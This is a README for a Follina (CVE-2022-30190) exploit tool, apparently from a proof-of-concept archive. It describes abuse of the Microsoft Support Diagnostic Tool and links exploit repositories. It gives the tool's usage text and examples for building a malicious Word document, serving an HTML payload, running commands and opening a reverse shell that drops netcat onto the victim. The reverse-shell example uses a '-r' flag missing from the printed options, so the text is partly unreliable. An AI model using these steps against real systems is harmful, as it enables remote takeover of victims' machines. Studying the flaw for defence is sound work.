Associated vulnerability
Description
Notes related to CVE-2022-30190
Introduction
# Follina
Notes related to CVE-2022-30190
FOLLINA: CVE-2022-30190
1. Uses the Microsoft Support Diagnostic Tool (MSDT).
2. Exploits the diagnostic window opened for diagnosis; when executed properly, it gives the attacker a reverse shell.
3. GitHub:
(a). https://github.com/JohnHammond/msdt-follina
(b). https://github.com/chvancooten/follina.py
4. Thanks to:
(a). @_johnhammond
(b). @networkchuck
5. Usage

```text
follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT]

options:
  -h, --help            show this help message and exit
  --command COMMAND, -c COMMAND
                        command to run on the target (default: calc)
  --output OUTPUT, -o OUTPUT
                        output maldoc file (default: ./follina.doc)
  --interface INTERFACE, -i INTERFACE
                        network interface or IP address to host the HTTP server (default: eth0)
  --port PORT, -p PORT  port to serve the HTTP server (default: 8000)
```
6. Examples

(a). Pop calc.exe:

```
$ python3 follina.py
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000
```

(b). Pop notepad.exe:

```
$ python3 follina.py -c "notepad"
```

(c). Get a reverse shell on port 9001.

Note, this downloads a netcat binary onto the victim and places it in C:\Windows\Tasks. It does not clean up the binary. This will trigger antivirus detections unless AV is disabled.

```
$ python3 follina.py -r 9001
```
File snapshot

```text
[4.0K] /data/pocs/2b8a3e4bcb2d832f819df91de0d567d988724b6b
└── [1.6K] README.md

0 directories, 1 file
```